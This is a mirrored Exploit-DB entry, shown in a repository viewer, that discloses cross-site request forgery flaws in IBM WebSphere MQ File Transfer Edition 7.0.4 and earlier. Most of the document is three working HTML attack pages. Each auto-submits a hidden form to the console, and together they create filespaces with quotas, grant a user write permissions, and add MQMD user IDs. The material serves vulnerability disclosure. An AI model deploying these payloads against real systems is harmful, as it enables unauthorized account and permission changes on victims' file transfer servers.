bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/webapps/20477.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

141 lines
No EOL
3.9 KiB
Text
Raw Permalink Blame History

*Exploit Author:* Nir Valtman
*Description:* Malicious user is able to add userspace, change permissions
on existing userspace and add MQMD (MQ Message Descriptor) user IDs. All of
the these vulnerabilities can be exploited using a CSRF (Cross Site Request
Forgery) attack.
Few days ago the CVE has
been published here<http://www-01.ibm.com/support/docview.wss?uid=swg21607482>
*
*
*Affected Platforms: *Version 7.0.4 and all previous versions of WebSphere MQ
File Transfer Edition<http://publib.boulder.ibm.com/infocenter/wmqfte/v7r0/index.jsp>running
on all platforms are affected.
* *
*
*
*Exploit Details:*
*1. CSRF To add user and define his quota on a userspace*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]* /wmqfteconsole/Filespaces"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="name" value="zzzzzz" />
<input type="hidden"
name="quota" value="15" />
<input type="hidden"
name="id" value="NewFileSpace" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 1]
*2. CSRF to add permissions on file spaces:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]*
/wmqfteconsole/FileSpacePermisssions"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="user" value="bodek2" />
<input type="hidden"
name="write" value="authorized" />
<input type="hidden"
name="id" value="zzzzzz_TEMP_PERMISSIONS" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 2]
*2. CSRF to add MQMD user id:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]*/wmqfteconsole/UploadUsers"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="userID" value="csrfUserId" />
<input type="hidden"
name="mqmdUserID" value="userIdTest" />
<input type="hidden"
name="id" value="NewUploadUser" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 3]
Best Regards,
Nir Valtman
Reference in a new issue View git blame Copy permalink